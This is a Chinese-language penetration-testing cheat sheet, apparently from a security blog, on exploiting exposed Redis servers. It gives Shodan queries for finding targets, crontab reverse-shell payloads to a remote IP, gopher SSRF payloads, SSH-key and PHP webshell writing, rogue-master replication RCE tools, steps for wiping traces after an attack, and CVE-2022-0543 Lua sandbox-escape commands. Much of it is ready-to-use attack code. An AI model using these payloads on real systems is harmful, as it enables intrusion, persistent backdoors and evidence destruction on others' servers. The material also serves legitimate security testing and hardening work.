Redis
shodan : "product:Redis"
shodan : product:"Redis key-value store"
fofa : protocol="redis"
Redis 基础
相关文章
相关工具
- yuyan-sec/RedisEXP - Redis 漏洞利用工具
未授权访问漏洞
漏洞描述
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的 ssh 公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以使用对应私钥直接使用 ssh 服务登录目标服务器、添加计划任务、写入 Webshell 等操作。
相关文章
搭建环境
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0 && make
vim redis.conf
# bind 127.0.0.1
protected-mode no
./src/redis-server redis.conf
或
bash f8x-dev -redis
测试
redis-cli -h <目标IP>
> info # 查看 redis 版本信息、一些具体信息、服务器版本信息等等:
> CONFIG GET dir # 获取默认的 redis 目录
> CONFIG GET dbfilename # 获取默认的 rdb 文件名
利用计划任务执行命令反弹 shell
在 redis 以 root 权限运行时可以写 crontab 来执行命令反弹 shell 先在自己的服务器上监听一个端口 nc -lvnp 4444 然后执行命令:
config set dir /var/spool/cron
config set dbfilename root
# payload
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.1/4444 0>&1\n\n"
save
这个方法只能 Centos 上使用,Ubuntu 上行不通,原因如下:
因为默认 redis 写文件后是 644 的权限,但 ubuntu 要求执行定时任务文件 /var/spool/cron/crontabs/<username> 权限必须是 600 也就是 -rw------- 才会执行,否则会报错 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定时任务文件 /var/spool/cron/<username > 权限 644 也能执行
因为 redis 保存 RDB 会存在乱码,在 Ubuntu 上会报错,而在 Centos 上不会报错
由于系统的不同,crontrab 定时文件位置也会不同:
- Centos 的定时任务文件在
/var/spool/cron/<username> - Ubuntu 定时任务文件在
/var/spool/cron/crontabs/<username>
gopher payload
curl -v "gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0a1%0d%0a\$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/192.168.1.1/8888>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$4%0d%0aroot%0d%0a*1%0d%0a\$4%0d%0asave%0d%0aquit%0d%0a"
写 ssh-keygen 公钥然后使用私钥登录
原理就是在数据库中插入一条数据,将本机的公钥作为 value,key 值随意,然后通过修改数据库的默认路径为 /root/.ssh 和默认的缓冲文件 authorized.keys ,把缓冲的数据保存在文件里,这样就可以在服务器端的 /root/.ssh 下生成一个授权的 key。
在以下条件下,可以利用此方法
- Redis 服务使用 ROOT 账号启动
- 服务器开放了 SSH 服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器.
首先在攻击机本地生成一对密钥
ssh-keygen -t rsa
然后执行命令:
# 将公钥的内容写到一个文本中命令如下
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
# 将里面的内容写入远程的 Redis 服务器上并且设置其 Key 为 test命令如下
cat test.txt | redis -cli -h <hostname> -x set test
redis-cli -h <hostname>
keys *
get test
# 设置 Redis 的备份路径为 /root/.ssh/ 和保存文件名为 authorized_keys ,并将数据保存在目标服务器硬盘上
config set dir "/root/.ssh"
config set dbfilename "authorized_keys"
save
保存后可以直接利用公钥登录 ssh
如果报错 (error) ERR Changing directory: No such file or directory 可能是因为 root 从来没有登录过
往 web 物理路径写 webshell
当 redis 权限不高时,并且服务器开着 web 服务,在 redis 有 web 目录写权限时,可以尝试往 web 路径写 webshell,执行以下命令
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
即可将 shell 写入 web 目录(web 目录根据实际情况)
这里的第三步写入 webshell 的时候,也可以使用
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"
\r\n\r\n 代表换行,用 redis 写入文件的话会自带一些版本信息,如果不换行的话可能会导致无法执行, 可见下图
gopher payload
gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0ax%0d%0a\$25%0d%0a%3C%3Fphp%20%40eval(%24_POST%5Bc%5D)%3B%3F%3E%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$13%0d%0a/var/www/html%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$9%0d%0ashell.php%0d%0a*1%0d%0a\$4%0d%0asave%0d%0a
SSRF 配合 Redis 未授权访问漏洞进行攻击
主从复制远程代码执行漏洞
漏洞描述
先创建一个恶意的 Redis 服务器作为 Redis 主机 (master),该 Redis 主机能够回应其他连接他的 Redis 从机的响应。有了恶意的 Redis 主机之后,就会远程连接目标 Redis 服务器,通过 slaveof 命令将目标 Redis 服务器设置为我们恶意 Redis 的 Redis 从机(slaver)。然后将恶意 Redis 主机上的 exp 同步到 Reids 主机上,并将 dbfilename 设置为 exp.so。最后再控制 Redis 从机(slaver)加载模块执行系统命令即可
补充 : redis 4.0.0 版本开始才支持 module load
相关文章
- Redis 基于主从复制的 RCE 利用方式
- Redis主从复制RCE影响分析 - 介绍了 redis 主从 rce 后如何恢复的方法,可以学习一下
POC | Payload | exp
- n0b0dyCN/redis-rogue-server - 该工具无法对 Redis 密码进行 Redis 认证,也就是说该工具只能在目标存在 Redis 未授权访问漏洞时使用。如果存在密码是不能使用的
python3 redis-rogue-server.py --rhost rhost --lhost lhost - Ridter/redis-rce
python3 redis-rce.py -r rhost -L lhost -f exp.so -a password - n0b0dyCN/RedisModules-ExecuteCommand
- 0671/RedisModules-ExecuteCommand-for-Windows
- LoRexxar/redis-rogue-server
- No-Github/redis-rogue-server-win - Redis 4.x & 5.x RCE
- r35tart/RedisWriteFile - 通过 Redis 主从写出无损文件
- Dliv3/redis-rogue-server
- 0671/RabR
搭建环境
yum install -y tcl
wget download.redis.io/releases/redis-4.0.11.tar.gz
tar zxf redis-4.0.11.tar.gz
cd redis-4.0.11
make PREFIX=/usr/local/redis install
/usr/local/redis/bin/redis-server
痕迹清除
在攻击之前将数据库原本的配置信息进行备份,攻击完成后,清除痕迹,恢复目录和数据库文件,同时卸载,删除模块
CONFIG get * # 获取所有的配置
CONFIG get dir # 获取 快照文件 保存的 位置
CONFIG get dbfilename # 获取 快照文件 的文件名
# 切断主从,关闭复制功能
slaveof no one
# 恢复目录
config set dir /data
# 通过 dump.rdb 文件恢复数据
config set dbfilename dump.rdb
# 删除 exp.so
system.exec 'rm ./exp.so'
# 卸载 system 模块的加载
module unload system
Lua RCE
相关文章
POC | Payload | exp
CVE-2022-0543 Redis沙盒逃逸
漏洞描述
在 Debian 上,Lua 由 Redis 动态加载,且在 Lua 解释器本身初始化时,module 和 require 以及 package 的 Lua 变量存在于上游 Lua 的全局环境中,而不是不存在于 Redis 的 Lua 上,并且前两个全局变量在上个版本中被清除修复了,而 package 并没有清除,所以导致 redis 可以加载上游的 Lua 全局变量 package 来逃逸沙箱。
相关文章
POC | Payload | exp
需要知道 package.loadlib 的路径
# 利用 luaopen_os 函数
eval 'local os_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_os"); local os = os_l(); os.execute("touch /tmp/redis_eval"); return 0' 0
# 利用 luaopen_io 函数
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
点击关注,共同学习!
安全狗的自我修养